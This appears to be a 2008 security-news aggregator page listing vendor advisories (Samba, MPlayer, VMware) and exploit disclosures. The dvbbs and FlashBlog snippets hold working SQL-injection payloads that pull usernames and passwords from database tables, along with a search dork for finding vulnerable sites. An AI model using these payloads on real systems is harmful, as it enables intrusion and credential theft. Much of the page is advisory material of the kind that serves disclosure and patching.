prev · 30.05.2008 · next 
| Mon | Tue | Wed | Thu | Fri | Sat | Sun |
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 | |
[SECURITY] [DSA 1590-1] New samba packages fix arbitrary code execution
( 134 days 4 hours ago)
- Debian Security Advisory DSA-1590-1 securityatdebian.org Florian Weimer May 30, 2008 - Package : samba Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE Id : CVE-2008-1105 Debian Bug : 483410 Alin Rad Pop discovered that Samba contained a buffer overflow condition ...
VMSA-2008-0008 Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion resolve critical security issues
( 134 days 4 hours ago)
Hash: SHA256 - VMware Security Advisory Advisory ID: VMSA-2008-0008 Synopsis: Updates to VMware Workstation, VMware Player, VMware ACE, VMware Fusion resolve critical security issues Issue date: 2008-05-30 Updated on: 2008-05-30 (initial release of advisory) CVE numbers: CVE-2008-2098 CVE-2008-2099 - 1. Summary: ...
Debian: New samba packages fix arbitrary code execution
( 134 days 4 hours ago)
LinuxSecurity.com: Alin Rad Pop discovered that Samba contained a buffer overflow condition when processing certain responses received while acting as a client, leading to arbitrary code execution (CVE-2008-1105).
Dot Net Nuke (DNN) <= 4.8.3 XSS Vulnerability
( 134 days 12 hours ago)
www.BugReport.ir # #AmnPardaz Security Research Team # # Title: Dot Net Nuke (DNN) XSS Vulnerability. # Vendor: www.dotnetnuke.com # Vulnerable Version: 4.8.3 and prior versions # Exploit: N/A # Impact: Low # Fix: N/A # Original Advisory: 1. Description: ...
Man charged with using cartoon names to defraud brokerages
( 134 days 16 hours ago)
A California man was arraigned in federal court for allegedly defrauding several brokerage firms in an online scheme.
XEROX DocuShare URL XSS Injection Vulnerabilities
( 134 days 17 hours ago)
XEROX DocuShare URL XSS Injection Vulnerabilities ...
Re: [HV-INFO] Enova hardware encryption: false sense of security
( 134 days 17 hours ago)
Hello, This is Robert Wann and I am representing Enova Technology. I'd like to respond to your published article about the so called "False Sense of Security" for balanced review. ...
dvbbs8.2(access/sql)version login.asp remote sql injection
( 134 days 17 hours ago)
name: where (topsec security research group) email: hackerbathotmail.com Subject: dvbbs8.2(access/sql)version login.asp remote sql injection danger level: critical/High info: dvbbs is prone to multiple sql injection security flaw interrelated code to access version(exp): password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dvadmin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271 Examples(access version): decide Where’ and ‘1’=’1 where’ and ‘1’=’2 ...
RE: Bypassing URL Authentication and Authorization with HTTP Verb Tampering
( 134 days 17 hours ago)
Interesting (and serendipitous, at that ). ISA Server 2004 allows you to configure "allowed / denied methods" in any rule for which the web proxy is involved; effectively nullifying this attack. ...
[ MDVSA-2008:108 ] - Updated samba packages fix arbitrary code execution vulnerability
( 134 days 17 hours ago)
Mandriva Linux Security Advisory MDVSA-2008:108 Package : samba Date : May 28, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 Problem Description: References: Updated Packages: Mandriva Linux 2007.1: 3bd8ec29ac470836a93c5a4254c8bde4 2007.1/i586/libsmbclient0-3.0.24-2.7mdv2007.1.i586.rpm fe38fb73d36265c8945c628d336a5e2f 2007.1/i586/libsmbclient0-devel-3.0.24-2.7mdv2007.1.i586.rpm 0a121812783387b84db2971fa72aea11 2007.1/i586/libsmbclient0-static-devel-3.0.24-2.7mdv2007.1.i586.rpm 09afced59c9c057d8de58a475cb56204 2007.1/i586/mount-cifs-3.0.24-2.7mdv2007.1.i586.rpm ...
Flash Blog Sql Injection
( 134 days 17 hours ago)
# # Name : FlashBlog sql Inyeccion # Author : Her0 # Dork : "flashblog", allinurl:flashblog.html # Greetz : Komtec1,Freak,Knet,Boer,ka0x # Proof of Concept : [ >>>
] The colums from host to host are diferent: all resolve =D /php/leercomentarios.php?articuloid=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/usuarios/* /php/leercomentarios.php?articuloid=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/from/**/usuarios/* /php/leercomentarios.php?articuloid=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/usuarios/* # ...
[ GLSA 200805-22 ] MPlayer: User-assisted execution of arbitrary code
( 134 days 17 hours ago)
- - Gentoo Linux Security Advisory GLSA 200805-22 - - - - Severity: Normal Title: MPlayer: User-assisted execution of arbitrary code Date: May 29, 2008 Bugs: #215006 ID: 200805-22 - - Synopsis An integer overflow vulnerability in MPlayer may allow for the ...
Re: [HV-INFO] Enova hardware encryption: false sense of security
( 134 days 17 hours ago)
Here Enova Technology comments ...
[ GLSA 200805-23 ] Samba: Heap-based buffer overflow
( 134 days 17 hours ago)
- - Gentoo Linux Security Advisory GLSA 200805-23 - - - - Severity: Normal Title: Samba: Heap-based buffer overflow Date: May 29, 2008 Bugs: #222299 ID: 200805-23 - - Synopsis A heap-based buffer overflow vulnerability was found in Samba, allowing ...
FlashBlog Remote File Upload Vulnerability
( 134 days 17 hours ago)Secunia Research: imlib2 PNM and XPM Buffer Overflow
( 134 days 17 hours ago)
Secunia Research 29/05/2008 - imlib2 PNM and XPM Buffer Overflows - Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 1) Affected Software * imlib2 1.4.0 NOTE: Other versions may also be affected. ...
Secunia Research: Samba "receive_smb_raw()" Buffer Overflow Vulnerability
( 134 days 17 hours ago)
Secunia Research 28/05/2008 - Samba "receivesmbraw()" Buffer Overflow Vulnerability - Table of Contents Affected Software....................................................1 Severity.............................................................2 Vendor's Description of Software.....................................3 Description of Vulnerability.........................................4 Solution.............................................................5 Time Table...........................................................6 Credits..............................................................7 References...........................................................8 About Secunia........................................................9 Verification........................................................10 1) Affected Software * Samba 3.0.28a and 3.0.29. ...
Mandriva: Updated gnome-settings-daemon package fixs various
( 134 days 22 hours ago)
LinuxSecurity.com: Gnome-settings-daemon was not respecting correctly user settings when disabling the background completely. This bug has been sfixed, improvement have been made in the time needed to display background when nautilus is used by the system, additional bugfixes and translations have been integrated in this updated package.
Gentoo: Samba Heap-based buffer overflow
( 134 days 22 hours ago)
LinuxSecurity.com: A heap-based buffer overflow vulnerability was found in Samba, allowing for the execution of arbitrary code.
Gentoo: MPlayer User-assisted execution of arbitrary
( 134 days 22 hours ago)
LinuxSecurity.com: An integer overflow vulnerability in MPlayer may allow for the execution of arbitrary code.
prev · 30.05.2008 · next
